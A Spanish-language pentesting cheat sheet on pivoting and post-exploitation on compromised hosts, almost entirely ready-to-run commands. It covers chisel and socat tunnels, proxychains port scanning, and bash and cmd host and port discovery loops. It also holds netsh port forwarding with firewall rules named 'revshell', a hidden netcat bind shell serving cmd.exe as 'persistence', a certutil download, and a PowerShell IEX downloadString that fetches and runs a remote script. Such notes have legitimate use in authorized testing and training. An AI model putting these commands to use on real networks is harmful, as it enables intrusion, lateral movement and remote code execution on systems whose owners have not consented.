Chisel
Server
Copiar ./chisel server --reverse -p 8000
Client
Copiar ./chisel client 10.10.10.5:8000 R:3000:127.0.0.1:3000
./chisel client 10.10.10.5:8000 R:4444:socks
Socat
Copiar ./socat tcp-listen:2222,fork,reuseaddr tcp:10.10.10.5:8000 &
Exponer un puerto local
Copiar socat TCP-LISTEN:8282,fork TCP:127.0.0.1:8080 &
En este caso, el puerto 8080
no esta expuesto fuera del equipo local, pero con el comando anterior exponemos el puerto hacia fuera a través del puerto 8282
.
Escaneo de puertos
Escaneo de puertos a través de proxychains usando hilos
Copiar seq 1 65535 | xargs -P 500 -I {} proxychains nmap -sT -p{} -open -T5 -Pn -n 10.10.10.16 -vvv -oN targeted 2>&1 | grep "tcp open"
Descubrimiento de hosts Windows
Copiar arp -d
for /L %a (1,1,254) do @start /b ping 40.40.40.%a -w 100 -n 2 >nul
arp -a
Descubrimiento de hosts Linux
Copiar #!/bin/bash
octetos=$(echo "$1" | grep -oE '([0-9]{1,3}\.){2}[0-9]{1,3}')
for i in $(seq 1 254); do
timeout 1 bash -c "ping -c 1 $octetos.$i" &>/dev/null && echo "[+] Host $octetos.$i - ACTIVE" &
done; wait
Copiar ./host-discovery.sh 192.168.1.0
Descubrimiento de hosts Linux (alternativa)
Si la máquina no cuenta con la utilidad ping
, podemos utilizar el siguiente script como alternativa:
Copiar #!/bin/bash
octetos=$(echo "$1" | grep -oE '([0-9]{1,3}\.){2}[0-9]{1,3}')
for i in $(seq 1 254); do
timeout 1 bash -c "echo >/dev/tcp/$octetos.$i/80" &>/dev/null && echo "[+] Host $octetos.$i - ACTIVE" &
done
wait
Copiar ./host-discovery.sh 192.168.1.0
Descubrimiento de puertos abiertos Linux
Copiar #!/bin/bash
for port in $(seq 1 65535); do
timeout 1 bash -c "echo '' > /dev/tcp/$1/$port" 2>/dev/null && echo "[+] Port $port - OPEN" &
done; wait
Copiar ./port-discovery.sh 192.168.1.10
Netsh
Mostrar la configuración actual del reenvío de puertos.
Copiar netsh interface portproxy show all
Port Forwarding
Copiar netsh interface portproxy add v4tov4 listenport=4444 listenaddress=0.0.0.0 connectport=5555 connectaddress=20.20.20.2
Abrir puertos en el Firewall
Copiar netsh advfirewall firewall add rule name=revshell protocol=TCP dir=in localport=4444 action=allow (IN)
netsh advfirewall firewall add rule name=revshell protocol=TCP dir=out localport=4444 action=allow (OUT)
Establecer una "persistencia" en Windows
Enviamos a segundo plano el proceso, abriendo un puerto para luego tener acceso más facil.
Copiar start "" /B nc.exe -l -p 10000 -e cmd.exe
Copiar proxychains rlwrap nc 10.10.10.6 -p 10000
Descargar un archivo desde Windows (cmd)
Copiar certutil -split -urlcache -f http://192.168.1.11/chisel.exe chisel.exe
Descargar un archivo desde Windows (Powershell)
Copiar IEX(New-Object Net.Webclient).downloadString('http://192.168.1.10/PowerView.ps1')
Última actualización hace 9 meses